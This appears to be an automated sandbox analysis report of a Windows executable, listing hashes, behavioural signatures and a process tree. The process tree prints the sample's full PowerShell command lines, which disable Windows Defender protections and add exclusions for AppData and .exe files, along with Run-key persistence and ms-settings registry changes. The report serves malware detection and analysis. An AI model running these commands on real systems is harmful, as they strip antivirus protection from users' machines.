Analysis
- max time kernel: 146s
- max time network: 148s
- platform: windows7_x64
- resource: win7-20240221-en
- resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
- submitted: 28-06-2024 16:41
Behavioral task: behavioral1
- Sample: c4e10100c5cf7bec2d9d0a1d7203ddb2.exe
- Resource: win7-20240221-en
General
- Target: c4e10100c5cf7bec2d9d0a1d7203ddb2.exe
- Size: 405KB
- MD5: c4e10100c5cf7bec2d9d0a1d7203ddb2
- SHA1: 24a6ecd52fb2165b8563a2853898316851638871
- SHA256: fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7
- SHA512: ff6bd9bdcb95641c5e19aeef99d9cdddb33b5b309ec358a1a50ba00d2cea9a3fa22a0239b4e09d4a8904d4b7f470bbc621d5e0d60331bc5800709d308faf3202
- SSDEEP: 6144:0NYzj2jBoO33tq6qbXaYBc1g5aN9KBBBBBBByygHG/bZbYdNpmIU:eYzAq81g5aN+BoKD
Malware Config
Signatures
- Command and Scripting Interpreter: PowerShell (1 TTP, 4 IoCs)
  Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
  Processes (pid, process):
  - 2608 powershell.exe
  - 500 powershell.exe
  - 1632 powershell.exe
  - 2880 powershell.exe
- Adds Run key to start application (2 TTPs, 1 IoC)
  Processes (description, ioc, process):
  - Set value (str): \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\JkanJjJrabo = "C:\\Users\\Admin\\AppData\\Local\\Temp\\c4e10100c5cf7bec2d9d0a1d7203ddb2.exe" (c4e10100c5cf7bec2d9d0a1d7203ddb2.exe)
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Modifies registry class (9 IoCs)
  Processes (description, ioc, process):
  - Key created: \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\ms-settings\shell\open (c4e10100c5cf7bec2d9d0a1d7203ddb2.exe)
  - Set value (str): \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\ms-settings\shell\open\command\ (c4e10100c5cf7bec2d9d0a1d7203ddb2.exe)
  - Key created: \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\ms-settings\shell\open\command (c4e10100c5cf7bec2d9d0a1d7203ddb2.exe)
  - Key created: \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\ms-settings\shell (c4e10100c5cf7bec2d9d0a1d7203ddb2.exe)
  - Key deleted: \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\ms-settings\shell\open\command (c4e10100c5cf7bec2d9d0a1d7203ddb2.exe)
  - Key deleted: \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\ms-settings\shell\open (c4e10100c5cf7bec2d9d0a1d7203ddb2.exe)
  - Key deleted: \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\ms-settings\shell (c4e10100c5cf7bec2d9d0a1d7203ddb2.exe)
  - Key deleted: \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\ms-settings (c4e10100c5cf7bec2d9d0a1d7203ddb2.exe)
  - Key created: \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\ms-settings (c4e10100c5cf7bec2d9d0a1d7203ddb2.exe)
- Suspicious behavior: EnumeratesProcesses (7 IoCs)
  Processes (pid, process):
  - 2156 c4e10100c5cf7bec2d9d0a1d7203ddb2.exe
  - 2824 powershell.exe
  - 2644 powershell.exe
  - 2608 powershell.exe
  - 500 powershell.exe
  - 1632 powershell.exe
  - 2880 powershell.exe
- Suspicious use of AdjustPrivilegeToken (7 IoCs)
  Processes (description, pid, process):
  - Token: SeDebugPrivilege, 2156 c4e10100c5cf7bec2d9d0a1d7203ddb2.exe
  - Token: SeDebugPrivilege, 2824 powershell.exe
  - Token: SeDebugPrivilege, 2644 powershell.exe
  - Token: SeDebugPrivilege, 2608 powershell.exe
  - Token: SeDebugPrivilege, 500 powershell.exe
  - Token: SeDebugPrivilege, 1632 powershell.exe
  - Token: SeDebugPrivilege, 2880 powershell.exe
- Suspicious use of SetWindowsHookEx (1 IoC)
  Processes (pid, process):
  - 2156 c4e10100c5cf7bec2d9d0a1d7203ddb2.exe
- Suspicious use of WriteProcessMemory (24 IoCs)
  Processes (description, pid, process, target process); each write is recorded three times in the report:
  - PID 2156 wrote to memory of 2052: c4e10100c5cf7bec2d9d0a1d7203ddb2.exe -> cmd.exe (3 entries)
  - PID 2156 wrote to memory of 3012: c4e10100c5cf7bec2d9d0a1d7203ddb2.exe -> cmd.exe (3 entries)
  - PID 2052 wrote to memory of 2608: cmd.exe -> powershell.exe (3 entries)
  - PID 3012 wrote to memory of 2644: cmd.exe -> powershell.exe (3 entries)
  - PID 3012 wrote to memory of 2824: cmd.exe -> powershell.exe (3 entries)
  - PID 3012 wrote to memory of 500: cmd.exe -> powershell.exe (3 entries)
  - PID 3012 wrote to memory of 1632: cmd.exe -> powershell.exe (3 entries)
  - PID 3012 wrote to memory of 2880: cmd.exe -> powershell.exe (3 entries)
- Uses Task Scheduler COM API (1 TTP)
  The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes (tree; each entry lists image path, command line, PID and matched signatures)
- C:\Users\Admin\AppData\Local\Temp\c4e10100c5cf7bec2d9d0a1d7203ddb2.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\c4e10100c5cf7bec2d9d0a1d7203ddb2.exe"
  PID: 2156
  Signatures:
  - Adds Run key to start application
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\c4e10100c5cf7bec2d9d0a1d7203ddb2.exe & exit
    PID: 2052
    Signatures:
    - Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\c4e10100c5cf7bec2d9d0a1d7203ddb2.exe
      PID: 2608
      Signatures:
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /k start /b powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'" & exit
    PID: 3012
    Signatures:
    - Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      PID: 2644
      Signatures:
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell Set-MpPreference -SubmitSamplesConsent 2
      PID: 2824
      Signatures:
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\AppData"
      PID: 500
      Signatures:
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\Local"
      PID: 1632
      Signatures:
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'"
      PID: 2880
      Signatures:
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Y070IKWTL0KLCYZJSBAR.temp
  Filesize: 7KB
  MD5: bb96597420ee22a94859bbb917f660f6
  SHA1: 1fa36f615713ccb0cc2bb3937a69ee20e4a37fcf
  SHA256: 2522dea1eae3b7a5968edd61c844c8ce6ed867390d744594f7313c1e22499000
  SHA512: 00dac3599231bc32fd59ded0848dc78354e06e56c6db39f4b3f64a6b4e20011d56267c7fd30fe967cf72e94c61e9880b0d2b8b7c8f4110149e8eea0c198e2e1b